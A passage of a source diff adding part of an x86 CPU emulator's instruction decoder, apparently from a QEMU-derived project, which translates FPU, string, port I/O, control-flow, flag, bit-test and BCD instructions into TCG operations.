+ break; + case 0x2a: /* fst sti */ + gen_helper_fmov_STN_ST0(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + break; + case 0x2b: /* fstp sti */ + case 0x0b: /* fstp1 sti, undocumented op */ + case 0x3a: /* fstp8 sti, undocumented op */ + case 0x3b: /* fstp9 sti, undocumented op */ + gen_helper_fmov_STN_ST0(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + gen_helper_fpop(tcg_ctx, cpu_env); + break; + case 0x2c: /* fucom st(i) */ + gen_helper_fmov_FT0_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + gen_helper_fucom_ST0_FT0(tcg_ctx, cpu_env); + break; + case 0x2d: /* fucomp st(i) */ + gen_helper_fmov_FT0_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + gen_helper_fucom_ST0_FT0(tcg_ctx, cpu_env); + gen_helper_fpop(tcg_ctx, cpu_env); + break; + case 0x33: /* de/3 */ + switch(rm) { + case 1: /* fcompp */ + gen_helper_fmov_FT0_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, 1)); + gen_helper_fcom_ST0_FT0(tcg_ctx, cpu_env); + gen_helper_fpop(tcg_ctx, cpu_env); + gen_helper_fpop(tcg_ctx, cpu_env); + break; + default: + goto illegal_op; + } + break; + case 0x38: /* ffreep sti, undocumented op */ + gen_helper_ffree_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + gen_helper_fpop(tcg_ctx, cpu_env); + break; + case 0x3c: /* df/4 */ + switch(rm) { + case 0: + gen_helper_fnstsw(tcg_ctx, cpu_tmp2_i32, cpu_env); + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_T[0], cpu_tmp2_i32); + gen_op_mov_reg_v(tcg_ctx, MO_16, R_EAX, *cpu_T[0]); + break; + default: + goto illegal_op; + } + break; + case 0x3d: /* fucomip */ + if (!(s->cpuid_features & CPUID_CMOV)) { + goto illegal_op; + } + gen_update_cc_op(s); + gen_helper_fmov_FT0_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + gen_helper_fucomi_ST0_FT0(tcg_ctx, cpu_env); + gen_helper_fpop(tcg_ctx, cpu_env); + set_cc_op(s, CC_OP_EFLAGS); + break; + case 0x3e: /* fcomip */ + if (!(s->cpuid_features & CPUID_CMOV)) { + goto illegal_op; + } + gen_update_cc_op(s); + gen_helper_fmov_FT0_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + gen_helper_fcomi_ST0_FT0(tcg_ctx, cpu_env); + gen_helper_fpop(tcg_ctx, cpu_env); + set_cc_op(s, CC_OP_EFLAGS); + break; + case 0x10: case 0x11: case 0x12: case 0x13: /* fcmovxx */ + case 0x18: case 0x19: case 0x1a: case 0x1b: + { + int op1, l1; + static const uint8_t fcmov_cc[8] = { + (JCC_B << 1), + (JCC_Z << 1), + (JCC_BE << 1), + (JCC_P << 1), + }; + + if (!(s->cpuid_features & CPUID_CMOV)) { + goto illegal_op; + } + op1 = fcmov_cc[op & 3] | (((op >> 3) & 1) ^ 1); + l1 = gen_new_label(tcg_ctx); + gen_jcc1_noeob(s, op1, l1); + gen_helper_fmov_ST0_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + gen_set_label(tcg_ctx, l1); + } + break; + default: + goto illegal_op; + } + fpu_update_ip(env, pc_start); + } + break; + /************************/ + /* string ops */ + + case 0xa4: /* movsS */ + case 0xa5: + ot = mo_b_d(b, dflag); + if (prefixes & (PREFIX_REPZ | PREFIX_REPNZ)) { + gen_repz_movs(s, ot, pc_start - s->cs_base, s->pc - s->cs_base); + } else { + gen_movs(s, ot); + } + break; + + case 0xaa: /* stosS */ + case 0xab: + ot = mo_b_d(b, dflag); + if (prefixes & (PREFIX_REPZ | PREFIX_REPNZ)) { + gen_repz_stos(s, ot, pc_start - s->cs_base, s->pc - s->cs_base); + } else { + gen_stos(s, ot); + } + break; + case 0xac: /* lodsS */ + case 0xad: + ot = mo_b_d(b, dflag); + if (prefixes & (PREFIX_REPZ | PREFIX_REPNZ)) { + gen_repz_lods(s, ot, pc_start - s->cs_base, s->pc - s->cs_base); + } else { + gen_lods(s, ot); + } + break; + case 0xae: /* scasS */ + case 0xaf: + ot = mo_b_d(b, dflag); + if (prefixes & PREFIX_REPNZ) { + gen_repz_scas(s, ot, pc_start - s->cs_base, s->pc - s->cs_base, 1); + } else if (prefixes & PREFIX_REPZ) { + gen_repz_scas(s, ot, pc_start - s->cs_base, s->pc - s->cs_base, 0); + } else { + gen_scas(s, ot); + } + break; + + case 0xa6: /* cmpsS */ + case 0xa7: + ot = mo_b_d(b, dflag); + if (prefixes & PREFIX_REPNZ) { + gen_repz_cmps(s, ot, pc_start - s->cs_base, s->pc - s->cs_base, 1); + } else if (prefixes & PREFIX_REPZ) { + gen_repz_cmps(s, ot, pc_start - s->cs_base, s->pc - s->cs_base, 0); + } else { + gen_cmps(s, ot); + } + break; + case 0x6c: /* insS */ // qq + case 0x6d: + ot = mo_b_d32(b, dflag); + tcg_gen_ext16u_tl(tcg_ctx, *cpu_T[0], *cpu_regs[R_EDX]); + gen_check_io(s, ot, pc_start - s->cs_base, + SVM_IOIO_TYPE_MASK | svm_is_rep(prefixes) | 4); + if (prefixes & (PREFIX_REPZ | PREFIX_REPNZ)) { + gen_repz_ins(s, ot, pc_start - s->cs_base, s->pc - s->cs_base); + } else { + gen_ins(s, ot); + } + break; + case 0x6e: /* outsS */ // qq + case 0x6f: + ot = mo_b_d32(b, dflag); + tcg_gen_ext16u_tl(tcg_ctx, *cpu_T[0], *cpu_regs[R_EDX]); + gen_check_io(s, ot, pc_start - s->cs_base, + svm_is_rep(prefixes) | 4); + if (prefixes & (PREFIX_REPZ | PREFIX_REPNZ)) { + gen_repz_outs(s, ot, pc_start - s->cs_base, s->pc - s->cs_base); + } else { + gen_outs(s, ot); + } + break; + + /************************/ + /* port I/O */ + + case 0xe4: // in + case 0xe5: // out + ot = mo_b_d32(b, dflag); + val = cpu_ldub_code(env, s->pc++); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], val); + gen_check_io(s, ot, pc_start - s->cs_base, + SVM_IOIO_TYPE_MASK | svm_is_rep(prefixes)); + tcg_gen_movi_i32(tcg_ctx, cpu_tmp2_i32, val); + gen_helper_in_func(tcg_ctx, ot, *cpu_T[1], cpu_tmp2_i32); + gen_op_mov_reg_v(tcg_ctx, ot, R_EAX, *cpu_T[1]); + break; + case 0xe6: + case 0xe7: + ot = mo_b_d32(b, dflag); + val = cpu_ldub_code(env, s->pc++); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], val); + gen_check_io(s, ot, pc_start - s->cs_base, + svm_is_rep(prefixes)); + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[1], R_EAX); + + tcg_gen_movi_i32(tcg_ctx, cpu_tmp2_i32, val); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp3_i32, *cpu_T[1]); + gen_helper_out_func(tcg_ctx, ot, cpu_tmp2_i32, cpu_tmp3_i32); + break; + case 0xec: + case 0xed: + ot = mo_b_d32(b, dflag); + tcg_gen_ext16u_tl(tcg_ctx, *cpu_T[0], *cpu_regs[R_EDX]); + gen_check_io(s, ot, pc_start - s->cs_base, + SVM_IOIO_TYPE_MASK | svm_is_rep(prefixes)); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + gen_helper_in_func(tcg_ctx, ot, *cpu_T[1], cpu_tmp2_i32); + gen_op_mov_reg_v(tcg_ctx, ot, R_EAX, *cpu_T[1]); + break; + case 0xee: + case 0xef: + ot = mo_b_d32(b, dflag); + tcg_gen_ext16u_tl(tcg_ctx, *cpu_T[0], *cpu_regs[R_EDX]); + gen_check_io(s, ot, pc_start - s->cs_base, + svm_is_rep(prefixes)); + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[1], R_EAX); + + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp3_i32, *cpu_T[1]); + gen_helper_out_func(tcg_ctx, ot, cpu_tmp2_i32, cpu_tmp3_i32); + break; + + /************************/ + /* control */ + case 0xc2: /* ret im */ + val = cpu_ldsw_code(env, s->pc); + s->pc += 2; + ot = gen_pop_T0(s); + gen_stack_update(s, val + (1 << ot)); + /* Note that gen_pop_T0 uses a zero-extending load. */ + gen_op_jmp_v(tcg_ctx, *cpu_T[0]); + gen_eob(s); + break; + case 0xc3: /* ret */ + ot = gen_pop_T0(s); + gen_pop_update(s, ot); + /* Note that gen_pop_T0 uses a zero-extending load. */ + gen_op_jmp_v(tcg_ctx, *cpu_T[0]); + gen_eob(s); + break; + case 0xca: /* lret im */ + val = cpu_ldsw_code(env, s->pc); + s->pc += 2; + do_lret: + if (s->pe && !s->vm86) { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_lret_protected(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, dflag - 1), + tcg_const_i32(tcg_ctx, val)); + } else { + gen_stack_A0(s); + /* pop offset */ + gen_op_ld_v(s, dflag, *cpu_T[0], cpu_A0); + /* NOTE: keeping EIP updated is not a problem in case of + exception */ + gen_op_jmp_v(tcg_ctx, *cpu_T[0]); + /* pop selector */ + gen_op_addl_A0_im(tcg_ctx, 1 << dflag); + gen_op_ld_v(s, dflag, *cpu_T[0], cpu_A0); + gen_op_movl_seg_T0_vm(tcg_ctx, R_CS); + /* add stack offset */ + gen_stack_update(s, val + (2 << dflag)); + } + gen_eob(s); + break; + case 0xcb: /* lret */ + val = 0; + goto do_lret; + case 0xcf: /* iret */ + gen_svm_check_intercept(s, pc_start, SVM_EXIT_IRET); + if (!s->pe) { + /* real mode */ + gen_helper_iret_real(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, dflag - 1)); + set_cc_op(s, CC_OP_EFLAGS); + } else if (s->vm86) { + if (s->iopl != 3) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_helper_iret_real(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, dflag - 1)); + set_cc_op(s, CC_OP_EFLAGS); + } + } else { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_iret_protected(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, dflag - 1), + tcg_const_i32(tcg_ctx, s->pc - s->cs_base)); + set_cc_op(s, CC_OP_EFLAGS); + } + gen_eob(s); + break; + case 0xe8: /* call im */ + { + if (dflag != MO_16) { + tval = (int32_t)insn_get(env, s, MO_32); + } else { + tval = (int16_t)insn_get(env, s, MO_16); + } + next_eip = s->pc - s->cs_base; + tval += next_eip; + if (dflag == MO_16) { + tval &= 0xffff; + } else if (!CODE64(s)) { + tval &= 0xffffffff; + } + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], next_eip); + gen_push_v(s, *cpu_T[0]); + gen_jmp(s, tval); + } + break; + case 0x9a: /* lcall im */ + { + unsigned int selector, offset; + + if (CODE64(s)) + goto illegal_op; + ot = dflag; + offset = insn_get(env, s, ot); + selector = insn_get(env, s, MO_16); + + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], selector); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[1], offset); + } + goto do_lcall; + case 0xe9: /* jmp im */ + if (dflag != MO_16) { + tval = (int32_t)insn_get(env, s, MO_32); + } else { + tval = (int16_t)insn_get(env, s, MO_16); + } + tval += s->pc - s->cs_base; + if (dflag == MO_16) { + tval &= 0xffff; + } else if (!CODE64(s)) { + tval &= 0xffffffff; + } + gen_jmp(s, tval); + break; + case 0xea: /* ljmp im */ + { + unsigned int selector, offset; + + if (CODE64(s)) + goto illegal_op; + ot = dflag; + offset = insn_get(env, s, ot); + selector = insn_get(env, s, MO_16); + + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], selector); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[1], offset); + } + goto do_ljmp; + case 0xeb: /* jmp Jb */ + tval = (int8_t)insn_get(env, s, MO_8); + tval += s->pc - s->cs_base; + if (dflag == MO_16) { + tval &= 0xffff; + } + gen_jmp(s, tval); + break; + //case 0x70 ... 0x7f: /* jcc Jb */ + case 0x70: case 0x71: case 0x72: case 0x73: case 0x74: case 0x75: case 0x76: case 0x77: + case 0x78: case 0x79: case 0x7a: case 0x7b: case 0x7c: case 0x7d: case 0x7e: case 0x7f: + tval = (int8_t)insn_get(env, s, MO_8); + goto do_jcc; + //case 0x180 ... 0x18f: /* jcc Jv */ + case 0x180: case 0x181: case 0x182: case 0x183: case 0x184: case 0x185: case 0x186: case 0x187: + case 0x188: case 0x189: case 0x18a: case 0x18b: case 0x18c: case 0x18d: case 0x18e: case 0x18f: + if (dflag != MO_16) { + tval = (int32_t)insn_get(env, s, MO_32); + } else { + tval = (int16_t)insn_get(env, s, MO_16); + } + do_jcc: + next_eip = s->pc - s->cs_base; + tval += next_eip; + if (dflag == MO_16) { + tval &= 0xffff; + } + gen_jcc(s, b, tval, next_eip); + break; + + //case 0x190 ... 0x19f: /* setcc Gv */ + case 0x190: case 0x191: case 0x192: case 0x193: case 0x194: case 0x195: case 0x196: case 0x197: + case 0x198: case 0x199: case 0x19a: case 0x19b: case 0x19c: case 0x19d: case 0x19e: case 0x19f: + modrm = cpu_ldub_code(env, s->pc++); + gen_setcc1(s, b, *cpu_T[0]); + gen_ldst_modrm(env, s, modrm, MO_8, OR_TMP0, 1); + break; + //case 0x140 ... 0x14f: /* cmov Gv, Ev */ + case 0x140: case 0x141: case 0x142: case 0x143: case 0x144: case 0x145: case 0x146: case 0x147: + case 0x148: case 0x149: case 0x14a: case 0x14b: case 0x14c: case 0x14d: case 0x14e: case 0x14f: + if (!(s->cpuid_features & CPUID_CMOV)) { + goto illegal_op; + } + ot = dflag; + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + gen_cmovcc1(env, s, ot, b, modrm, reg); + break; + + /************************/ + /* flags */ + case 0x9c: /* pushf */ + gen_svm_check_intercept(s, pc_start, SVM_EXIT_PUSHF); + if (s->vm86 && s->iopl != 3) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_update_cc_op(s); + gen_helper_read_eflags(tcg_ctx, *cpu_T[0], cpu_env); + gen_push_v(s, *cpu_T[0]); + } + break; + case 0x9d: /* popf */ + gen_svm_check_intercept(s, pc_start, SVM_EXIT_POPF); + if (s->vm86 && s->iopl != 3) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + ot = gen_pop_T0(s); + if (s->cpl == 0) { + if (dflag != MO_16) { + gen_helper_write_eflags(tcg_ctx, cpu_env, *cpu_T[0], + tcg_const_i32(tcg_ctx, (TF_MASK | AC_MASK | + ID_MASK | NT_MASK | + IF_MASK | + IOPL_MASK))); + } else { + gen_helper_write_eflags(tcg_ctx, cpu_env, *cpu_T[0], + tcg_const_i32(tcg_ctx, (TF_MASK | AC_MASK | + ID_MASK | NT_MASK | + IF_MASK | IOPL_MASK) + & 0xffff)); + } + } else { + if (s->cpl <= s->iopl) { + if (dflag != MO_16) { + gen_helper_write_eflags(tcg_ctx, cpu_env, *cpu_T[0], + tcg_const_i32(tcg_ctx, (TF_MASK | + AC_MASK | + ID_MASK | + NT_MASK | + IF_MASK))); + } else { + gen_helper_write_eflags(tcg_ctx, cpu_env, *cpu_T[0], + tcg_const_i32(tcg_ctx, (TF_MASK | + AC_MASK | + ID_MASK | + NT_MASK | + IF_MASK) + & 0xffff)); + } + } else { + if (dflag != MO_16) { + gen_helper_write_eflags(tcg_ctx, cpu_env, *cpu_T[0], + tcg_const_i32(tcg_ctx, (TF_MASK | AC_MASK | + ID_MASK | NT_MASK))); + } else { + gen_helper_write_eflags(tcg_ctx, cpu_env, *cpu_T[0], + tcg_const_i32(tcg_ctx, (TF_MASK | AC_MASK | + ID_MASK | NT_MASK) + & 0xffff)); + } + } + } + gen_pop_update(s, ot); + set_cc_op(s, CC_OP_EFLAGS); + /* abort translation because TF/AC flag may change */ + gen_jmp_im(s, s->pc - s->cs_base); + gen_eob(s); + } + break; + case 0x9e: /* sahf */ + if (CODE64(s) && !(s->cpuid_ext3_features & CPUID_EXT3_LAHF_LM)) + goto illegal_op; + gen_op_mov_v_reg(tcg_ctx, MO_8, *cpu_T[0], R_AH); + gen_compute_eflags(s); + tcg_gen_andi_tl(tcg_ctx, cpu_cc_src, cpu_cc_src, CC_O); + tcg_gen_andi_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], CC_S | CC_Z | CC_A | CC_P | CC_C); + tcg_gen_or_tl(tcg_ctx, cpu_cc_src, cpu_cc_src, *cpu_T[0]); + break; + case 0x9f: /* lahf */ + if (CODE64(s) && !(s->cpuid_ext3_features & CPUID_EXT3_LAHF_LM)) + goto illegal_op; + gen_compute_eflags(s); + /* Note: gen_compute_eflags() only gives the condition codes */ + tcg_gen_ori_tl(tcg_ctx, *cpu_T[0], cpu_cc_src, 0x02); + gen_op_mov_reg_v(tcg_ctx, MO_8, R_AH, *cpu_T[0]); + break; + case 0xf5: /* cmc */ + gen_compute_eflags(s); + tcg_gen_xori_tl(tcg_ctx, cpu_cc_src, cpu_cc_src, CC_C); + break; + case 0xf8: /* clc */ + gen_compute_eflags(s); + tcg_gen_andi_tl(tcg_ctx, cpu_cc_src, cpu_cc_src, ~CC_C); + break; + case 0xf9: /* stc */ + gen_compute_eflags(s); + tcg_gen_ori_tl(tcg_ctx, cpu_cc_src, cpu_cc_src, CC_C); + break; + case 0xfc: /* cld */ + tcg_gen_movi_i32(tcg_ctx, cpu_tmp2_i32, 1); + tcg_gen_st_i32(tcg_ctx, cpu_tmp2_i32, cpu_env, offsetof(CPUX86State, df)); + break; + case 0xfd: /* std */ + tcg_gen_movi_i32(tcg_ctx, cpu_tmp2_i32, -1); + tcg_gen_st_i32(tcg_ctx, cpu_tmp2_i32, cpu_env, offsetof(CPUX86State, df)); + break; + + /************************/ + /* bit operations */ + case 0x1ba: /* bt/bts/btr/btc Gv, im */ + ot = dflag; + modrm = cpu_ldub_code(env, s->pc++); + op = (modrm >> 3) & 7; + mod = (modrm >> 6) & 3; + rm = (modrm & 7) | REX_B(s); + if (mod != 3) { + s->rip_offset = 1; + gen_lea_modrm(env, s, modrm); + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + } else { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], rm); + } + /* load shift */ + val = cpu_ldub_code(env, s->pc++); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[1], val); + if (op < 4) + goto illegal_op; + op -= 4; + goto bt_op; + case 0x1a3: /* bt Gv, Ev */ + op = 0; + goto do_btx; + case 0x1ab: /* bts */ + op = 1; + goto do_btx; + case 0x1b3: /* btr */ + op = 2; + goto do_btx; + case 0x1bb: /* btc */ + op = 3; + do_btx: + ot = dflag; + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + mod = (modrm >> 6) & 3; + rm = (modrm & 7) | REX_B(s); + gen_op_mov_v_reg(tcg_ctx, MO_32, *cpu_T[1], reg); + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + /* specific case: we need to add a displacement */ + gen_exts(tcg_ctx, ot, *cpu_T[1]); + tcg_gen_sari_tl(tcg_ctx, cpu_tmp0, *cpu_T[1], 3 + ot); + tcg_gen_shli_tl(tcg_ctx, cpu_tmp0, cpu_tmp0, ot); + tcg_gen_add_tl(tcg_ctx, cpu_A0, cpu_A0, cpu_tmp0); + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + } else { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], rm); + } + bt_op: + tcg_gen_andi_tl(tcg_ctx, *cpu_T[1], *cpu_T[1], (1 << (3 + ot)) - 1); + tcg_gen_shr_tl(tcg_ctx, cpu_tmp4, *cpu_T[0], *cpu_T[1]); + switch(op) { + case 0: + break; + case 1: + tcg_gen_movi_tl(tcg_ctx, cpu_tmp0, 1); + tcg_gen_shl_tl(tcg_ctx, cpu_tmp0, cpu_tmp0, *cpu_T[1]); + tcg_gen_or_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], cpu_tmp0); + break; + case 2: + tcg_gen_movi_tl(tcg_ctx, cpu_tmp0, 1); + tcg_gen_shl_tl(tcg_ctx, cpu_tmp0, cpu_tmp0, *cpu_T[1]); + tcg_gen_andc_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], cpu_tmp0); + break; + default: + case 3: + tcg_gen_movi_tl(tcg_ctx, cpu_tmp0, 1); + tcg_gen_shl_tl(tcg_ctx, cpu_tmp0, cpu_tmp0, *cpu_T[1]); + tcg_gen_xor_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], cpu_tmp0); + break; + } + if (op != 0) { + if (mod != 3) { + gen_op_st_v(s, ot, *cpu_T[0], cpu_A0); + } else { + gen_op_mov_reg_v(tcg_ctx, ot, rm, *cpu_T[0]); + } + } + + /* Delay all CC updates until after the store above. Note that + C is the result of the test, Z is unchanged, and the others + are all undefined. */ + switch (s->cc_op) { + case CC_OP_MULB: case CC_OP_MULW: case CC_OP_MULL: case CC_OP_MULQ: //case CC_OP_MULB ... CC_OP_MULQ: + case CC_OP_ADDB: case CC_OP_ADDW: case CC_OP_ADDL: case CC_OP_ADDQ: //case CC_OP_ADDB ... CC_OP_ADDQ: + case CC_OP_ADCB: case CC_OP_ADCW: case CC_OP_ADCL: case CC_OP_ADCQ: //case CC_OP_ADCB ... CC_OP_ADCQ: + case CC_OP_SUBB: case CC_OP_SUBW: case CC_OP_SUBL: case CC_OP_SUBQ: //case CC_OP_SUBB ... CC_OP_SUBQ: + case CC_OP_SBBB: case CC_OP_SBBW: case CC_OP_SBBL: case CC_OP_SBBQ: //case CC_OP_SBBB ... CC_OP_SBBQ: + case CC_OP_LOGICB: case CC_OP_LOGICW: case CC_OP_LOGICL: case CC_OP_LOGICQ: //case CC_OP_LOGICB ... CC_OP_LOGICQ: + case CC_OP_INCB: case CC_OP_INCW: case CC_OP_INCL: case CC_OP_INCQ: //case CC_OP_INCB ... CC_OP_INCQ: + case CC_OP_DECB: case CC_OP_DECW: case CC_OP_DECL: case CC_OP_DECQ: //case CC_OP_DECB ... CC_OP_DECQ: + case CC_OP_SHLB: case CC_OP_SHLW: case CC_OP_SHLL: case CC_OP_SHLQ: //case CC_OP_SHLB ... CC_OP_SHLQ: + case CC_OP_SARB: case CC_OP_SARW: case CC_OP_SARL: case CC_OP_SARQ: //case CC_OP_SARB ... CC_OP_SARQ: + case CC_OP_BMILGB: case CC_OP_BMILGW: case CC_OP_BMILGL: case CC_OP_BMILGQ: //case CC_OP_BMILGB ... CC_OP_BMILGQ: + /* Z was going to be computed from the non-zero status of CC_DST. + We can get that same Z value (and the new C value) by leaving + CC_DST alone, setting CC_SRC, and using a CC_OP_SAR of the + same width. */ + tcg_gen_mov_tl(tcg_ctx, cpu_cc_src, cpu_tmp4); + set_cc_op(s, ((s->cc_op - CC_OP_MULB) & 3) + CC_OP_SARB); + break; + default: + /* Otherwise, generate EFLAGS and replace the C bit. */ + gen_compute_eflags(s); + tcg_gen_deposit_tl(tcg_ctx, cpu_cc_src, cpu_cc_src, cpu_tmp4, + ctz32(CC_C), 1); + break; + } + break; + case 0x1bc: /* bsf / tzcnt */ + case 0x1bd: /* bsr / lzcnt */ + ot = dflag; + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + gen_extu(tcg_ctx, ot, *cpu_T[0]); + + /* Note that lzcnt and tzcnt are in different extensions. */ + if ((prefixes & PREFIX_REPZ) + && (b & 1 + ? s->cpuid_ext3_features & CPUID_EXT3_ABM + : s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI1)) { + int size = 8 << ot; + tcg_gen_mov_tl(tcg_ctx, cpu_cc_src, *cpu_T[0]); + if (b & 1) { + /* For lzcnt, reduce the target_ulong result by the + number of zeros that we expect to find at the top. */ + gen_helper_clz(tcg_ctx, *cpu_T[0], *cpu_T[0]); + tcg_gen_subi_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], TARGET_LONG_BITS - size); + } else { + /* For tzcnt, a zero input must return the operand size: + force all bits outside the operand size to 1. */ + target_ulong mask = (target_ulong)-2 << (size - 1); + tcg_gen_ori_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], mask); + gen_helper_ctz(tcg_ctx, *cpu_T[0], *cpu_T[0]); + } + /* For lzcnt/tzcnt, C and Z bits are defined and are + related to the result. */ + gen_op_update1_cc(tcg_ctx); + set_cc_op(s, CC_OP_BMILGB + ot); + } else { + /* For bsr/bsf, only the Z bit is defined and it is related + to the input and not the result. */ + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0]); + set_cc_op(s, CC_OP_LOGICB + ot); + if (b & 1) { + /* For bsr, return the bit index of the first 1 bit, + not the count of leading zeros. */ + gen_helper_clz(tcg_ctx, *cpu_T[0], *cpu_T[0]); + tcg_gen_xori_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], TARGET_LONG_BITS - 1); + } else { + gen_helper_ctz(tcg_ctx, *cpu_T[0], *cpu_T[0]); + } + /* ??? The manual says that the output is undefined when the + input is zero, but real hardware leaves it unchanged, and + real programs appear to depend on that. */ + tcg_gen_movi_tl(tcg_ctx, cpu_tmp0, 0); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, *cpu_T[0], cpu_cc_dst, cpu_tmp0, + *cpu_regs[reg], *cpu_T[0]); + } + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + break; + /************************/ + /* bcd */ + case 0x27: /* daa */ + if (CODE64(s)) + goto illegal_op; + gen_update_cc_op(s); + gen_helper_daa(tcg_ctx, cpu_env); + set_cc_op(s, CC_OP_EFLAGS); + break; + case 0x2f: /* das */ + if (CODE64(s)) + goto illegal_op; + gen_update_cc_op(s); + gen_helper_das(tcg_ctx, cpu_env); + set_cc_op(s, CC_OP_EFLAGS); + break; + case 0x37: /* aaa */ + if (CODE64(s)) + goto illegal_op; + gen_update_cc_op(s); + gen_helper_aaa(tcg_ctx, cpu_env); + set_cc_op(s, CC_OP_EFLAGS); + break; + case 0x3f: /* aas */ + if (CODE64(s)) + goto illegal_op; + gen_update_cc_op(s); + gen_helper_aas(tcg_ctx, cpu_env); + set_cc_op(s, CC_OP_EFLAGS); + break; + case 0xd4: /* aam */ + if (CODE64(s)) + goto illegal_op; + val = cpu_ldub_code(env, s->pc++); + if (val == 0) { + gen_exception(s, EXCP00_DIVZ, pc_start - s->cs_base); + } else { + gen_helper_aam(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, val)); + set_cc_op(s, CC_OP_LOGICB); + } + break; + case 0xd5: /* aad */ + if (CODE64(s)) + goto illegal_op; + val = cpu_ldub_code(env, s->pc++); + gen_helper_aad(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, val)); + set_cc_op(s, CC_OP_LOGICB); + break; + /************************/ + /* misc */ + case 0x90: /* nop */ + /* XXX: correct lock test for all insn */ + if (prefixes & PREFIX_LOCK) { + goto illegal_op; + } + /* If REX_B is set, then this is xchg eax, r8d, not a nop. */ + if (REX_B(s)) { + goto do_xchg_reg_eax; + } + if (prefixes & PREFIX_REPZ) { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_pause(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, s->pc - pc_start)); + s->is_jmp = DISAS_TB_JUMP; + } + break; + case 0x9b: /* fwait */ + if ((s->flags & (HF_MP_MASK | HF_TS_MASK)) == + (HF_MP_MASK | HF_TS_MASK)) { + gen_exception(s, EXCP07_PREX, pc_start - s->cs_base); + } else { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_fwait(tcg_ctx, cpu_env); + } + break; + case 0xcc: /* int3 */ + gen_interrupt(s, EXCP03_INT3, pc_start - s->cs_base, s->pc - s->cs_base); + break; + case 0xcd: /* int N */ + val = cpu_ldub_code(env, s->pc++); + if (s->vm86 && s->iopl != 3) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_interrupt(s, val, pc_start - s->cs_base, s->pc - s->cs_base); + } + break; + case 0xce: /* into */ + if (CODE64(s)) + goto illegal_op; + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_into(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, s->pc - pc_start)); + break; +#ifdef WANT_ICEBP + case 0xf1: /* icebp (undocumented, exits to external debugger) */ + gen_svm_check_intercept(s, pc_start, SVM_EXIT_ICEBP); +#if 1 + gen_debug(s, pc_start - s->cs_base); +#else + /* start debug */ + tb_flush(env); + qemu_set_log(CPU_LOG_INT | CPU_LOG_TB_IN_ASM); +#endif + break; +#endif + case 0xfa: /* cli */ + if (!s->vm86) { + if (s->cpl <= s->iopl) { + gen_helper_cli(tcg_ctx, cpu_env); + } else { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } + } else { + if (s->iopl == 3) { + gen_helper_cli(tcg_ctx, cpu_env); + } else { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } + } + break; + case 0xfb: /* sti */ + if (!s->vm86) { + if (s->cpl <= s->iopl) { + gen_sti: + gen_helper_sti(tcg_ctx, cpu_env); + /* interruptions are enabled only the first insn after sti */ + /* If several instructions disable interrupts, only the + 